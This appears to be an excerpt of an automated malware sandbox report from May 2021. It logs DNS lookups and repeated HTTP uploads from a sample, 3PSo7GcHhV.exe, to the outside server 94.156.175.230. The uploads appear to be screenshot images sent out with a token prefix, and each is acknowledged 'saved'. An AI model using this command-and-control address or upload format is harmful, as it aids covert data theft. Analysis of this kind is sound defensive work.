                                                                  May 28, 2021 13:00:14.693797112 CEST5756853192.168.2.38.8.8.8
                                                                  May 28, 2021 13:00:14.743650913 CEST53575688.8.8.8192.168.2.3
                                                                  May 28, 2021 13:00:24.937238932 CEST5054053192.168.2.38.8.8.8
                                                                  May 28, 2021 13:00:25.014735937 CEST53505408.8.8.8192.168.2.3
                                                                  May 28, 2021 13:00:26.216763020 CEST5436653192.168.2.38.8.8.8
                                                                  May 28, 2021 13:00:26.277103901 CEST53543668.8.8.8192.168.2.3
                                                                  May 28, 2021 13:00:46.008856058 CEST5303453192.168.2.38.8.8.8
                                                                  May 28, 2021 13:00:46.069245100 CEST53530348.8.8.8192.168.2.3
                                                                  May 28, 2021 13:00:46.862643957 CEST5776253192.168.2.38.8.8.8
                                                                  May 28, 2021 13:00:46.931854963 CEST53577628.8.8.8192.168.2.3
                                                                  May 28, 2021 13:01:01.235439062 CEST5543553192.168.2.38.8.8.8
                                                                  May 28, 2021 13:01:01.296511889 CEST53554358.8.8.8192.168.2.3
                                                                  May 28, 2021 13:01:04.822403908 CEST5071353192.168.2.38.8.8.8
                                                                  May 28, 2021 13:01:04.882550001 CEST53507138.8.8.8192.168.2.3
                                                                  May 28, 2021 13:01:36.408122063 CEST5613253192.168.2.38.8.8.8
                                                                  May 28, 2021 13:01:36.474874020 CEST53561328.8.8.8192.168.2.3
                                                                  May 28, 2021 13:01:38.234044075 CEST5898753192.168.2.38.8.8.8
                                                                  May 28, 2021 13:01:38.300391912 CEST53589878.8.8.8192.168.2.3

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.34971894.156.175.23080C:\Users\user\Desktop\3PSo7GcHhV.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 28, 2021 13:00:03.605779886 CEST1084OUTData Raw: 73 62 79 63 49 43 4b 48 57 77 61 36 44 33 6b 70 49 52 71 53 61 36 58 34 2f 30 30 30 30 70 b3 9f 01 00 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12
                                                                  Data Ascii: sbycICKHWwa6D3kpIRqSa6X4/0000pJFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"
                                                                  May 28, 2021 13:00:03.670228004 CEST1094OUTData Raw: 64 78 5e eb 89 00 20 95 3f bd 3c 1e 9d 0d 79 6f c5 eb ab 6b ef 1c 5c cf 6b 3c 53 c2 db 76 c9 13 86 53 88 d0 1c 11 ee 0f e5 5d 38 75 fb c5 fd 74 37 7a 45 7a f9 76 7d 8f 3a c1 a2 a6 2b 49 b2 bd 3e 51 73 11 52 f6 a7 14 f6 a6 95 c5 2b 05 c4 a2 8c 1a
                                                                  Data Ascii: dx^ ?<yok\k<SvS]8ut7zEzv}:+I>QsR+\P1(@'zu%(!+d)?&Z^-,7c#D>W]?d,fe;9Ueu$v6jf=*tU<o89H@STh;K
                                                                  May 28, 2021 13:00:03.670273066 CEST1110OUTData Raw: 36 eb fe fd 1a 39 90 72 b2 80 a5 ab df d8 5a b7 fd 03 6e bf ef d1 a5 fe c2 d5 bf e8 1b 75 ff 00 7e 8d 3e 64 2e 56 51 a2 af 7f 61 6a df f4 0d ba ff 00 bf 46 8f ec 2d 5b fe 81 b7 5f f7 e8 d1 cc 85 ca ca 14 a2 af ff 00 61 ea df f4 0d ba ff 00 bf 46
                                                                  Data Ascii: 69rZnu~>d.VQajF-[_aFhznhVu4zU=[FVu4s eQWo]G@i.e*Z:_MW_]4{Uu4bjFe
                                                                  May 28, 2021 13:00:03.734921932 CEST1118OUTData Raw: 44 5e 4b 48 30 c9 b3 38 22 3c 6e df c1 61 c5 24 5e 1a b4 9d f5 39 12 79 96 08 f4 f8 ae ac 72 cb ba 59 1e 23 28 43 c0 cf cb 1c a3 8c 1c 81 59 37 5e 20 d4 2e b4 0b 0d 0d 2e 2e a0 b0 b5 89 d2 58 52 e1 bc ab 82 d2 b4 81 99 38 19 1b 80 e7 3f 74 1a b5
                                                                  Data Ascii: D^KH08"<na$^9yrY#(CY7^ ...XR8?t-TSq}Axz]~}JtORi4}6tyDIq:4Ir1x<^j-zeG+!D@f-`>![CWP|?SLec}H#<t ,a
                                                                  May 28, 2021 13:00:03.735160112 CEST1131OUTData Raw: 1a 70 55 08 b2 29 63 8c 97 27 1c 13 fd 2a e0 d4 ee 65 1b a0 d3 65 78 cf 46 67 0b 9a 92 1b 86 bd 26 37 86 6b 69 23 3b b9 5e 3d 38 35 cc e3 34 ae ff 00 33 a1 4a 0d d9 7e 47 05 7f 61 36 9f 72 62 94 71 fc 2d d9 85 55 ae d3 c4 d6 fb 34 96 91 a4 67 21
                                                                  Data Ascii: pU)c'*eexFg&7ki#;^=8543J~Ga6rbq-U4g!qXK6aEUQE-QL(((KIK@QLBEQE1Q@KM!iE%-(RR!h%---6fhS"EEE%(!bMBIE1
                                                                  May 28, 2021 13:00:03.735198021 CEST1134OUTData Raw: 6d f4 ac 48 87 ef 93 fd e1 5b fa f0 fd c5 bf d2 b0 a2 ff 00 5e 9f ef 0a ca 9f f0 ce f9 69 33 a7 d4 b3 be 3f f7 6a 8d 5e d4 7f d6 47 fe ed 52 35 14 be 12 2b 7c 6c 6d 2d 14 56 86 42 d1 45 14 0c 05 3a 9b 4e a4 34 02 9d 4d 14 ea 45 21 68 a4 a5 a4 31
                                                                  Data Ascii: mH[^i3?j^GR5+|lm-VBE:N4ME!h1iu"/t@_yE5OW;s!Kig:K9xLhpp-,M?'^7V?V>"*y0q<pA4#E,}*
                                                                  May 28, 2021 13:00:03.735208035 CEST1139OUTData Raw: 40 14 52 d1 40 09 4b 45 2d 20 0a 9e d9 32 e3 eb 50 a8 cd 5d b5 4f de 2f d6 b3 9b d0 d6 8c 6f 21 da f0 fd cc 35 81 08 ff 00 48 8f fd e1 5d 1e bc bf b8 8c fa 57 3f 0f fc 7c c7 fe f0 a9 a3 fc 23 ae a6 95 4e 93 51 ff 00 5a 9f ee d5 1a bd a8 ff 00 ae
                                                                  Data Ascii: @R@KE- 2P]O/o!5H]W?|#NQZ_jE/3KIKn)ANNQE!T_yWhC)/"\'x!]+.?V~#GOL:H*Q],CQTD9zMhxycz
                                                                  May 28, 2021 13:00:03.735223055 CEST1142OUTData Raw: c6 c0 4e 38 5f 7a d1 f2 ed 3f e7 c2 e7 fe f9 3f e3 49 a6 e9 97 56 36 86 1f b4 a2 13 21 6c aa ee c8 c0 1d fe 86 ae 79 17 7f f3 fb ff 00 90 85 79 d3 77 93 68 ec 8e c5 3b 85 85 74 7d 47 ca b7 96 2f f4 77 ce f0 46 7e 53 ef 5e 77 5e 93 7f 1c c9 a3 df
                                                                  Data Ascii: N8_z??IV6!lyywh;t}G/wF~S^w^y||qjuRQZ`-)i(RQIL)@0E!iiQEKE-QLA@ZZJZQE0pp)iJ(E-RRbRZb(bRq)E0Z)q
                                                                  May 28, 2021 13:00:03.735265017 CEST1150OUTData Raw: 3f c0 6a fb 5e 5a cb fe ae e8 c7 f5 5a 81 e3 91 f9 8e f9 18 7d 71 56 aa c9 ef a1 93 a3 15 b6 a4 43 4f 93 f8 8a 8f c6 9d f6 24 5f bf 3a 8f c6 a0 92 da e8 75 6d df 46 cd 57 68 e4 53 ca b0 ab 57 7f 68 86 a2 ba 1a 1e 55 9a 7d e9 b3 f4 a3 cc b1 4e cc
                                                                  Data Ascii: ?j^ZZ}qVCO$_:umFWhSWhU}N^{l/[/?ZCBihQi"jGTFjJWB\#uv?7q=IQUE%--%$Q[0}+>xV?u-/aKGeO|k:uu:?9
                                                                  May 28, 2021 13:00:03.735285044 CEST1156OUTData Raw: f4 7e de 3f d7 a5 ff 00 20 f6 32 39 4d f4 79 98 ad 5d 47 4e b2 8b c3 f1 ea 96 c2 ee 36 97 52 9a d4 43 70 54 94 44 48 d8 03 80 32 c0 b9 04 f1 9c 0e 05 45 e2 4d 3a 1d 1f c4 fa 9e 99 6e d2 3c 36 97 0d 12 34 84 16 20 1e f8 00 67 f0 a6 aa a6 ed fd 74
                                                                  Data Ascii: ~? 29My]GN6RCpTDH2EM:n<64 gt1:M+a4o4+jjrm8V!`:J\J7vG5i~$;~cqV|?o5htmjvFk}:iotM.odXu+v_$u1~H
                                                                  May 28, 2021 13:00:03.864506006 CEST1180INData Raw: 73 61 76 65 64
                                                                  Data Ascii: saved


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.34971994.156.175.23080C:\Users\user\Desktop\3PSo7GcHhV.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 28, 2021 13:00:04.257359982 CEST1198OUTData Raw: 73 62 79 63 49 43 4b 48 57 77 61 36 44 33 6b 70 49 52 71 53 61 36 58 34 2f 30 30 30 30 70 67 a2 01 00 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12
                                                                  Data Ascii: sbycICKHWwa6D3kpIRqSa6X4/0000pgJFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"
                                                                  May 28, 2021 13:00:04.323532104 CEST1204OUTData Raw: 64 78 5e eb 89 00 20 95 3f bd 3c 1e 9d 0d 79 6f c5 eb ab 6b ef 1c 5c cf 6b 3c 53 c2 db 76 c9 13 86 53 88 d0 1c 11 ee 0f e5 5d 38 75 fb c5 fd 74 37 7a 45 7a f9 76 7d 8f 3a c1 a2 a6 2b 49 b2 bd 3e 51 73 11 52 f6 a7 14 f6 a6 95 c5 2b 05 c4 a2 8c 1a
                                                                  Data Ascii: dx^ ?<yok\k<SvS]8ut7zEzv}:+I>QsR+\P1(@'zu%(!+d)?&Z^-,7c#D>W]?d,fe;9Ueu$v6jf=*tU<o89H@STh;K
                                                                  May 28, 2021 13:00:04.323615074 CEST1217OUTData Raw: e7 fd 59 0c d8 8e 40 70 a4 1f 93 d0 1a e1 cc 51 bb 6e 65 e6 8f 22 2c 63 6d 72 4b 0d 27 26 d3 ef fd 7d ed b3 aa 38 84 a3 66 bf af f8 6d 0e b3 52 b0 d2 34 fd 37 5b b8 6d 29 16 ea 2f b0 c6 60 92 69 48 b1 96 64 90 ca bc 30 24 a9 51 c3 12 41 18 39 c1
                                                                  Data Ascii: Y@pQne",cmrK'&}8fmR47[m)/`iHd0$QA9kC56mrewlAe1 9/q\(9N4<5Io/OC0[#-+B]Nm;Q DyVL>1rpI5]in.-n5nleW*V,drQ8l{W,mc$u88^O'.ot
                                                                  May 28, 2021 13:00:04.324071884 CEST1220OUTData Raw: 23 7a 78 a6 8e 26 7b 62 a4 e4 55 26 8f 07 a5 76 77 3a 66 41 e2 b1 2e b4 f2 84 9c 57 35 4a 1d 51 e9 d0 c5 c6 5a 18 85 2a 32 b5 a0 61 c1 e9 50 49 16 2b 92 54 ec 77 46 a2 66 07 7a b3 60 03 6a 56 a1 ba 19 90 1f cc 55 6a 72 39 8e 45 75 e1 94 82 2b cc
                                                                  Data Ascii: #zx&{bU&vw:fA.W5JQZ*2aPI+TwFfz`jVUjr9Eu+jS8 G7u~Sr(a[Ok{KateUGF<Jg5<2t7hG"&K!O`G`3TiG_9G4?c$zsb[]it:3
                                                                  May 28, 2021 13:00:04.324101925 CEST1223OUTData Raw: ce 1a 57 61 f9 16 c5 7c f0 7e 23 78 c3 fe 86 0b cf fb e8 7f 85 1f f0 b1 7c 61 ff 00 43 05 ef fd f7 59 42 9d 78 2b 46 56 5e ac d2 73 a1 37 79 46 ef d1 1f 53 c5 14 70 c4 b1 45 1a c7 1a 0c 2a 20 c0 03 d0 0a f9 cf e3 2f fc 94 39 ff 00 eb de 2f fd 06
                                                                  Data Ascii: Wa|~#x|aCYBx+FV^s7yFSpE* /9/?bx-VY^t7B$@N|(rQ-%-%GOJ_#rJoihU#&D/b9S"br9OU*yd}+@];S
                                                                  May 28, 2021 13:00:04.324126959 CEST1225OUTData Raw: 8c da eb 17 16 f0 ea f3 58 c9 77 0c a8 23 b3 85 11 1b ce 97 f7 64 10 37 12 79 51 85 ae 43 4d d4 ec ad f4 94 d3 75 4d 2a 5b eb 78 ae be d7 0f 93 75 e4 32 b1 01 59 5b 28 c1 95 82 af 40 0f 1c 1e 6b 46 db c5 d9 90 5d ea 1a 64 d7 1a 84 5a b4 ba b4 12
                                                                  Data Ascii: Xw#d7yQCMuM*[xu2Y[(@kF]dZwFL+&%AAe8=_Q6s*<0}EX7lM7OL0&wSCq{<O-{5NmqzmR}+t-roU5&Lqw1<ezv\[%
                                                                  May 28, 2021 13:00:04.388032913 CEST1228OUTData Raw: c8 f5 e8 ff 00 8a b2 73 c4 2e 87 44 21 85 7f 69 a3 9d 9b 47 b8 4f f9 64 df 80 aa 4f 64 e8 79 52 3e a2 bb a8 f5 cb 52 06 e0 b5 38 d4 34 89 87 ef 51 2a 7e b7 56 3b c4 dd 61 69 4b e1 a8 79 ea c2 4f 18 34 86 dc fa 57 a9 e9 5a 76 83 77 72 1e 25 46 7f
                                                                  Data Ascii: s.D!iGOdOdyR>R84Q*~V;aiKyO4WZvwr%Fl&0H7c'*+)f":!7h<ls8Y\z*ZDf^)QKte&^)P~mk5brT$#?4WT+F[sEfpWZwuUNl?M>
                                                                  May 28, 2021 13:00:04.388381958 CEST1234OUTData Raw: 01 07 8f c6 ad d8 6a 92 f8 84 b5 b4 f6 3a 86 95 77 6c c2 42 5e 30 57 90 47 0c 46 0f 04 f6 ac e7 4f 11 05 76 f6 f3 5f 95 cd 21 52 84 dd 92 df c9 fe 76 3e 6b f1 37 86 6f bc 2f aa bd 95 e2 65 73 98 a5 03 e5 91 7d 45 63 57 bf fc 5d d2 fc 9f 04 49 73
                                                                  Data Ascii: j:wlB^0WGFOv_!Rv>k7o/es}EcW]Is-"|<BTu!vr+!EQ[4wRQK)-'zQJh)hQJ)(K(!NPHNSPQIKT&-- Np$u($vyN)CLd
                                                                  May 28, 2021 13:00:04.388415098 CEST1236OUTData Raw: a2 ac 22 6b 93 3b b0 fb 2a b7 dc 12 00 a4 ee 7e a1 17 73 63 92 05 74 52 78 9e d3 4e f1 34 17 33 5c c0 24 b7 bb d4 25 5d 8c b7 4b b1 ed 23 8a 12 cd 1e e4 62 c5 39 19 38 39 ce 05 64 4f 7f a1 6a d6 77 d0 c9 a8 35 84 9a b4 d1 df 38 9a 39 64 5b 6b 94
                                                                  Data Ascii: "k;*~sctRxN43\$%]K#b989dOjw589d[k]%0aF}b_:~f1\7>gU{[ZEinn&~z"',;U+mLVq]GT'x5klmd`j8Se69$?7.
                                                                  May 28, 2021 13:00:04.388431072 CEST1239OUTData Raw: f4 c4 7f 21 58 75 cb 85 fe 1f de 56 3f f8 df 70 b8 a5 c1 a4 cd 2e 6b a4 e3 0a 78 a6 52 83 52 34 49 4b 4d 06 97 bd 22 d0 a2 9c 29 b9 a7 0a 45 21 dd a9 45 20 ed 4f 15 05 a1 47 5a 90 54 75 20 15 2c d1 0b 4f 14 de d4 a2 a4 d1 0f 1d 6a 40 78 a8 87 ad
                                                                  Data Ascii: !XuV?p.kxRR4IKM")E!E OGZTu ,Oj@x<Zd8iT204QNjNyOuokA*%h|Fuz=KQoR1Ji40Ro\}.E);YRxobLxx\M.)7.cE7x8q)8
                                                                  May 28, 2021 13:00:04.517985106 CEST1294INData Raw: 73 61 76 65 64
                                                                  Data Ascii: saved


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  10192.168.2.34996394.156.175.23080C:\Users\user\Desktop\3PSo7GcHhV.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 28, 2021 13:00:11.125061989 CEST2227OUTData Raw: 73 62 79 63 49 43 4b 48 57 77 61 36 44 33 6b 70 49 52 71 53 61 36 58 34 2f 30 30 30 30 70 c5 a5 01 00 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12
                                                                  Data Ascii: sbycICKHWwa6D3kpIRqSa6X4/0000pJFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"
                                                                  May 28, 2021 13:00:11.189610958 CEST2233OUTData Raw: b2 14 6f bf d7 38 f5 e9 9f c6 aa 6a 16 13 a5 c4 92 db c4 c6 1e 24 f9 5c ee 56 c9 dc 40 eb dc 1c 0f 43 f4 a9 34 8d 3e 68 a7 59 e6 8d 51 36 0f 2d 4b 92 ca 7d c7 63 83 83 d7 f9 d0 07 c9 3a cf fc 87 75 0f fa f9 93 ff 00 42 35 4a ae 6b 3f f2 1c d4 3f
                                                                  Data Ascii: o8j$\V@C4>hYQ6-K}c:uB5Jk??O:#8EsT!h4uCGjb@4h042KV<v`3i\,tZ?aFCZ8+WuCg8U7=T<QI.+j?n6'
                                                                  May 28, 2021 13:00:11.189678907 CEST2239OUTData Raw: df fa bd ff 00 af f8 25 2a d1 da df d5 ac 68 cf a2 6a 36 b6 8f 75 35 b1 48 11 20 76 6d ea 70 26 52 d1 9c 03 9e 40 27 db be 2a 85 34 44 a0 e4 66 9f 5d 0a fd 4e 77 6e 83 4f 43 5d dc 96 9a 0d b5 bd cc 7f d8 11 cb 2d a6 83 6d a9 f9 af 75 37 ef 65 71
                                                                  Data Ascii: %*hj6u5H vmp&R@'*4Df]NwnOC]-mu7eqe`GQ)QR2]%y+:ZK[n^<ddGyRuh7Rm2{MfX;(XTndq>JzRtwxc&TzPKwHK)7n/o@Wv0
                                                                  May 28, 2021 13:00:11.189701080 CEST2244OUTData Raw: f8 52 8f 0e eb aa c1 86 8f a9 02 0e 41 16 af c7 e9 5e fb a1 87 74 bd 9d d7 7f 99 f3 ca be 21 55 f6 96 7d be 47 a5 78 7b c4 eb e2 18 b4 45 9d 80 bf b7 bc 2b 32 f4 dd fe 8f 36 18 7d 7b fb fe 15 e4 9f 1a ff 00 e4 a2 cd ff 00 5e d1 7f 2a ed 3c 19 a4
                                                                  Data Ascii: RA^t!U}Gx{E+26}{^*<xL3#I,02O\W(_|M8S%Ok~0'SM#(\PRLG`grYA($2{;CrWzV}~o-T38nD
                                                                  May 28, 2021 13:00:11.189718962 CEST2247OUTData Raw: 88 46 85 f6 41 99 18 12 42 91 92 ab 8e b8 3d 2b ce c8 c8 c5 68 dc 78 83 5e bb 68 1e e7 5e d5 27 6b 77 f3 20 69 2e e4 63 13 7f 79 49 3c 1f 71 59 55 8c a4 d3 8f 4b fe 36 fc 8d 69 ca 29 34 ce aa f6 d3 4d ba d0 f4 7b e7 b7 d4 97 4e b3 d1 65 bb 16 be
                                                                  Data Ascii: FAB=+hx^h^'kw i.cyI<qYUK6i)4M{NebP<v<H|+Y/n.x,e2Hq`?xwltuG\8cRhfM'29UcwwI,i{"E,pV*5S}6\4Q[|VFXWz`
                                                                  May 28, 2021 13:00:11.189732075 CEST2249OUTData Raw: 3f 91 ae ff 00 d0 47 4e ff 00 c0 07 ff 00 e3 d5 0d c6 9f aa dd c7 e5 5c dd e9 72 c7 9c ed 7d 39 c8 cf fd fe ae 6e 45 fc cb f1 ff 00 23 a3 9d ff 00 2b fc 3f cc f0 4f 1e f8 1e 6f 0b dd b5 d5 ae e9 34 c9 1b e5 6e f1 93 fc 27 fa 1a e3 04 ac 3b 9a f7
                                                                  Data Ascii: ?GN\r}9nE#+?Oo4n';}B;;h';0p&in2"vz<UAt3=TRT[-j>t5Tv:SOt.Y-1CO=J;Z)GNia5l\g=DfdiXuV
                                                                  May 28, 2021 13:00:11.189743996 CEST2252OUTData Raw: 4e 6b 2c 31 a7 89 2b 39 53 4c 4b 9a 3b 33 a2 82 fd 1f 86 23 f1 ab aa b6 b3 0c bc 6a 7e 95 ca 2c b5 62 2b 99 41 f9 37 1f a5 72 d4 c3 f5 4e c7 55 3c 53 5a 4d 5c ea 53 4c b5 7f f5 67 6f b5 48 34 72 47 40 c2 b1 6d ef 2e c7 fc b2 6c 7a 9e 2b 5a df 52
                                                                  Data Ascii: Nk,1+9SLK;3#j~,b+A7rNU<SZM\SLgoH4rG@m.lz+ZRt|jfz4jal+~9Gex5IdzWQ>iU5uu9@>jWXc`:,kVqRUw6jB%S:KzWGLy+ky
                                                                  May 28, 2021 13:00:11.189755917 CEST2255OUTData Raw: ab 6a d7 7f c2 ef 5f ba df 71 d2 9d 2d 13 fe bf af d4 9a 4d 1f 4d b0 b6 37 b7 f2 dd 34 36 f6 f6 de 7c 11 32 ac 92 5c 4e 8d 22 a2 b1 04 22 84 00 92 43 1c 8c 63 9e 2b c3 06 8f 24 17 9a bc 8b 7f 1e 99 6e d1 c4 b6 be 6a 34 f2 4a e1 88 51 26 d0 02 e1
                                                                  Data Ascii: j_q-MM746|2\N""Cc+$nj4JQ&l=iVP4?O5sxsi%yR05ZI-nY;dYvm703;}yoKZh4op]d(f_OfCDQu lHTHY2;
                                                                  May 28, 2021 13:00:11.254019022 CEST2259OUTData Raw: fe d4 8e c1 6d d6 67 66 b5 32 93 e5 f9 84 a9 e0 e0 f2 0b 11 d0 e0 f1 58 37 fa ec da 95 b3 8b ad 2f 4e 92 f9 d0 23 ea 1b 5c 4c e0 77 20 3f 96 5b 1c 6e d9 9e f9 cf 35 2a f8 ab 55 4d 56 f3 51 58 6c fc fb bd 46 0d 46 40 51 b6 89 22 2c 54 0f 9b ee 92
                                                                  Data Ascii: mgf2X7/N#\Lw ?[n5*UMVQXlFF@Q",T#9jKMi|'$kR;ww-m#,wuok''iaf2tRn<$)!tpMm`S>Q\5(dIcmqlu[[cZM
                                                                  May 28, 2021 13:00:11.254091024 CEST2270OUTData Raw: 50 9d 39 a6 cf 23 a2 8a 75 79 07 d2 96 ff 00 b2 35 3f fa 07 5d ff 00 df 86 ff 00 0a 3f b1 f5 3f fa 07 5d ff 00 df 86 ff 00 0a fa 4e cf 46 d0 8e 9b 69 2c f6 33 bc 8f 12 17 64 f3 4e 49 50 49 e0 7b ff 00 9c 56 6e ab 79 e0 fd 1f 52 96 c6 e3 4b bf 79
                                                                  Data Ascii: P9#uy5?]??]NFi,3dNIPI{VnyRKyb_CqZ_,#voR:Kr>~w~(w~+|::?o~4V$Un[zzq,T,'v|:7UiaZ)x^ASI51
                                                                  May 28, 2021 13:00:11.383254051 CEST2329INData Raw: 73 61 76 65 64
                                                                  Data Ascii: saved


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  11192.168.2.34996494.156.175.23080C:\Users\user\Desktop\3PSo7GcHhV.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 28, 2021 13:00:11.937675953 CEST2343OUTData Raw: 73 62 79 63 49 43 4b 48 57 77 61 36 44 33 6b 70 49 52 71 53 61 36 58 34 2f 30 30 30 30 70 c5 a5 01 00 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12
                                                                  Data Ascii: sbycICKHWwa6D3kpIRqSa6X4/0000pJFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"
                                                                  May 28, 2021 13:00:12.004899979 CEST2347OUTData Raw: b2 14 6f bf d7 38 f5 e9 9f c6 aa 6a 16 13 a5 c4 92 db c4 c6 1e 24 f9 5c ee 56 c9 dc 40 eb dc 1c 0f 43 f4 a9 34 8d 3e 68 a7 59 e6 8d 51 36 0f 2d 4b 92 ca 7d c7 63 83 83 d7 f9 d0 07 c9 3a cf fc 87 75 0f fa f9 93 ff 00 42 35 4a ae 6b 3f f2 1c d4 3f
                                                                  Data Ascii: o8j$\V@C4>hYQ6-K}c:uB5Jk??O:#8EsT!h4uCGjb@4h042KV<v`3i\,tZ?aFCZ8+WuCg8U7=T<QI.+j?n6'
                                                                  May 28, 2021 13:00:12.004950047 CEST2352OUTData Raw: 00 e8 62 b2 cd 5c d2 ec 75 3b fb d5 4d 26 d2 f2 e6 ea 21 e6 81 69 13 3b a6 08 f9 be 51 91 83 8e 7e 94 3d 81 6e 7d 11 af 78 76 ff 00 c4 de 3f 9a d2 f6 69 61 d3 a1 b7 12 40 ca 32 08 c0 07 6f 6c ee 3c fb 01 ed 5c 8f c5 b9 9f 41 5f 0d d9 32 89 8c 56
                                                                  Data Ascii: b\u;M&!i;Q~=n}xv?ia@2ol<\A_2VF&l;v>#R`3yNEP6go!}+M%-sqifk7E`-CPi'VEMJTZ'XhceW)*O@N>:f43au~]*I;7_7j6
                                                                  May 28, 2021 13:00:12.004962921 CEST2355OUTData Raw: 8a 62 16 8e d4 52 d0 02 52 f4 ad 1d 1b 46 ba d6 ef 96 d6 d5 49 76 20 70 32 72 7a 00 3d 6b b7 1f 05 fc 4f d7 c9 ff 00 c7 a3 ff 00 e2 eb 19 e2 69 42 5c b2 7a fa 37 f9 23 b2 96 5f 88 ab 4d 54 8a 49 3d af 28 c6 fe 97 6a e7 9b e2 80 2b d2 3f e1 4b f8
                                                                  Data Ascii: bRRFIv p2rz=kOiB\z7#_MTI=(j+?Kxu/YZUN+|T}vw?5YV%8GI42[J]N5t<FQE1A4%QHb)iq@RPZCK@KIQE/j((QKE0Z))(Z(
                                                                  May 28, 2021 13:00:12.005079985 CEST2363OUTData Raw: f8 52 8f 0e eb aa c1 86 8f a9 02 0e 41 16 af c7 e9 5e fb a1 87 74 bd 9d d7 7f 99 f3 ca be 21 55 f6 96 7d be 47 a5 78 7b c4 eb e2 18 b4 45 9d 80 bf b7 bc 2b 32 f4 dd fe 8f 36 18 7d 7b fb fe 15 e4 9f 1a ff 00 e4 a2 cd ff 00 5e d1 7f 2a ed 3c 19 a4
                                                                  Data Ascii: RA^t!U}Gx{E+26}{^*<xL3#I,02O\W(_|M8S%Ok~0'SM#(\PRLG`grYA($2{;CrWzV}~o-T38nD
                                                                  May 28, 2021 13:00:12.005116940 CEST2371OUTData Raw: 3f 91 ae ff 00 d0 47 4e ff 00 c0 07 ff 00 e3 d5 0d c6 9f aa dd c7 e5 5c dd e9 72 c7 9c ed 7d 39 c8 cf fd fe ae 6e 45 fc cb f1 ff 00 23 a3 9d ff 00 2b fc 3f cc f0 4f 1e f8 1e 6f 0b dd b5 d5 ae e9 34 c9 1b e5 6e f1 93 fc 27 fa 1a e3 04 ac 3b 9a f7
                                                                  Data Ascii: ?GN\r}9nE#+?Oo4n';}B;;h';0p&in2"vz<UAt3=TRT[-j>t5Tv:SOt.Y-1CO=J;Z)GNia5l\g=DfdiXuV
                                                                  May 28, 2021 13:00:12.070153952 CEST2376OUTData Raw: fe d4 8e c1 6d d6 67 66 b5 32 93 e5 f9 84 a9 e0 e0 f2 0b 11 d0 e0 f1 58 37 fa ec da 95 b3 8b ad 2f 4e 92 f9 d0 23 ea 1b 5c 4c e0 77 20 3f 96 5b 1c 6e d9 9e f9 cf 35 2a f8 ab 55 4d 56 f3 51 58 6c fc fb bd 46 0d 46 40 51 b6 89 22 2c 54 0f 9b ee 92
                                                                  Data Ascii: mgf2X7/N#\Lw ?[n5*UMVQXlFF@Q",T#9jKMi|'$kR;ww-m#,wuok''iaf2tRn<$)!tpMm`S>Q\5(dIcmqlu[[cZM
                                                                  May 28, 2021 13:00:12.070192099 CEST2381OUTData Raw: fc 79 a9 49 ab fc 18 b5 bd 98 e6 59 26 8d 5c fa b2 b3 29 3f 89 19 af 0a 35 ee 9e 3d d3 64 d2 3e 0c 5a d9 4c 31 2a 4d 19 71 e8 cc cc c4 7e 04 e2 bc 2a aa 8f 2d e7 c9 b5 dd 85 53 9b 96 1c fb d9 5c 5a 29 29 6b 63 20 ed 45 2f 6a 43 40 82 81 45 28 a0
                                                                  Data Ascii: yIY&\)?5=d>ZL1*Mq~*-S\Z))kc E/jC@E(%-0KH(BIGz`(J(&::2X)b(Lp,pD))i2SD)HRZpL.i3J)}(MNhiQ>8&n8Sd5I\4
                                                                  May 28, 2021 13:00:12.070395947 CEST2387OUTData Raw: bf 8a b8 b0 7f c2 97 ab 3e 92 ae b3 8f a2 3d 9a f3 8f 0c 69 00 7f cf 21 fc ab 1f bd 6c ea 1c 78 7b 48 1f f4 c8 7f 2a c6 35 c9 85 f8 3e 6c ac 77 f1 7e 42 d1 8a 4c d1 9a e9 39 2e 3b bd 3a 98 0d 3c 52 29 07 34 e1 49 4b 52 52 1d 9a 75 37 3c 52 83 49
                                                                  Data Ascii: >=i!lx{H*5>lw~BL9.;:<R)4IKRRu7<RIN:SK4C:jYhp(hONH)<sRBN(NVS_zA]AZE^Q@IYg1RSIz\fv~TLDuF8KA
                                                                  May 28, 2021 13:00:12.070429087 CEST2390OUTData Raw: a4 45 a9 c1 a8 c6 55 59 c0 63 11 23 9e 3b 7f fa ab 77 45 b4 7f 0a 78 0e 41 a8 b2 ab c5 1c 92 ba 83 f7 49 e8 b9 f5 e8 3e a6 b5 71 a7 08 c6 71 7c cd db 46 ef 7b f9 6f a3 ee 62 a5 52 72 94 24 b9 52 be a9 5a d6 f3 db 55 d8 e5 fe 2a ea 49 ab fc 1e 4d
                                                                  Data Ascii: EUYc#;wExAI>qq|F{obRr$RZU*IMAhhX~~vAG;0+VQl7n+R!jI$4Tfj>XsDGF>xVQh$.x_dozO5GZ_bo_i\R45Wa{X)b
                                                                  May 28, 2021 13:00:12.210030079 CEST2440INData Raw: 73 61 76 65 64
                                                                  Data Ascii: saved


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  12192.168.2.34996594.156.175.23080C:\Users\user\Desktop\3PSo7GcHhV.exe
